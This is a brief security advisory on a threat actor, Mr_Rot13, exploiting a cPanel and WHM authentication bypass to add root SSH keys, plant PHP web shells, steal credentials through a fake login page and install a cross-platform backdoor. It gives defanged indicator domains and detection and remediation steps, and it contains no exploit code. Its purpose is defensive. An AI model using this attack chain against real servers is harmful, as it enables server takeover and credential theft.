Mr_Rot13 actor exploits cPanel CVE-2026-41940 to deploy cross-platform 'Filemanager' backdoor

QiAnXin XLab has tied the ongoing exploitation of cPanel's CVE-2026-41940 to a previously-quiet threat actor it tracks as Mr_Rot13, who has been operating since at least 2020. The attack chain exploits the cPanel and WHM authentication bypass to drop a Go-based infector that adds an attacker SSH key, plants a PHP web shell, and serves a fake login page to steal cPanel credentials (ROT13-encoded, exfiltrated to wrned[.]com). The final payload is a cross-platform backdoor called Filemanager that runs on Windows, macOS, and Linux. XLab counts over 2,000 attacker source IPs currently scanning for this flaw.

Check

Search cPanel and WHM authentication logs for unusual successful logins since April 28. Check /root/.ssh/authorized_keys on every cPanel host for unknown public keys, and search web roots for unfamiliar PHP files.

Affected

Any cPanel or WHM installation that was not patched against CVE-2026-41940 between disclosure on April 28, 2026, and now. Indicators of Mr_Rot13 compromise include the SSH public key added under root, the wrned[.]com credential exfiltration domain, the cp.dene[.]de[.]com infector source, and the wpsock[.]com Filemanager delivery domain.

Fix

If still unpatched, install the cPanel fix for CVE-2026-41940 immediately. On any host that was internet-exposed and unpatched, assume compromise: remove unknown SSH keys from root, sweep for unfamiliar PHP web shells, block the indicator domains wrned[.]com, cp.dene[.]de[.]com, and wpsock[.]com at egress, rotate cPanel and WHM root credentials, and check bash_history for evidence of attacker reconnaissance.